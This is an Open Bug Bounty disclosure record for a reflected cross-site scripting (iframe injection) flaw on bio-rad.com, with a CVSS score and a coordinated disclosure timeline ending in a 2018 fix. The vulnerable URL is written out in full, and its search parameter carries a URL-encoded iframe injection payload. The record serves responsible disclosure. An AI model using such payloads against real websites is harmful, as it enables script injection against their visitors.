bio-rad.com IFRAME Injection vulnerability

2016-03-30T20:01:00
ID OBB:144069
Type openbugbounty
Reporter ahmetomeroglu
Modified 2018-03-15T02:10:00

Description

Open Bug Bounty ID: OBB-144069

Description| Value
---|---
Affected Website:| bio-rad.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.bio-rad.com/evportal/evolutionPortal.portal?_nfpb=true&_pageLabel=search_page&sfMode;=search&sfStartNumber;=1&clearQR;=true&js;=1&searchString;=clinic&database;=%22%3E%3Ciframe%20src=%22https://xssposed.org%22%3Eproductskus+productcategories+productdetails+msds+literatures+inserts+faqs+downloads+webpages+assays+genes+pathways+plates+promotions&tabName;=DIVISIONNAME
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 30 March, 2016 20:01 GMT
Vulnerability Verified:| 30 March, 2016 20:03 GMT
Website Operator Notified:| 30 March, 2016 20:03 GMT
Vulnerability Published:| 30 March, 2016 20:03 GMT[without any technical details]
Vulnerability Fixed:| 15 March, 2018 02:10 GMT
Public Disclosure:| 15 March, 2018 02:10 GMT